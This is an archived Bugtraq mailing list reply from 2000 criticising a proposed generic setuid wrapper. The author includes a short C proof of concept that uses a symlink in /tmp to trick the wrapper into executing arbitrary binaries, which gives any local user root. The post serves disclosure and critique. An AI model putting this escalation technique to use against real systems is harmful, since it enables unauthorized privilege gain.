Bugtraq mailing list archives

Re: Format String Attacks


From: Pavel Kankovsky <peak () ARGO TROJA MFF CUNI CZ>
Date: Wed, 13 Sep 2000 23:36:40 +0200

On Wed, 13 Sep 2000, Doug Hughes wrote:

> Since I don't recall anybody else posting one, here is a simple, generic,
> setuid wrapper that people could use around, for instance, /usr/bin/eject
> or other setuid programs.

<ironic>

Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>
#include <time.h>

int
main(int argc, char **argv, char **envp)
{
  char oldpath[MAXPATHLEN];
  char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];

  ++argv;
  srandom(getpid() + 5*time(NULL));
  if (argc < 2)
    { fprintf(stderr, "missing argument\n"); return 1; }
  if (realpath(argv[0], oldpath) == NULL)
    { fprintf(stderr, "realpath failed\n"); return 1; }
  sprintf(newpath, "/tmp/%ld.orig", random());
  if (symlink(oldpath, newpath) == -1)
    { perror("symlink"); return 1; }
  strrchr(newpath, '.')[0] = '\0';
  argv[0] = newpath;
  execve("path-to-your-wrapper", argv, envp);
  perror("execve"); return 1;
}

</ironic>

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

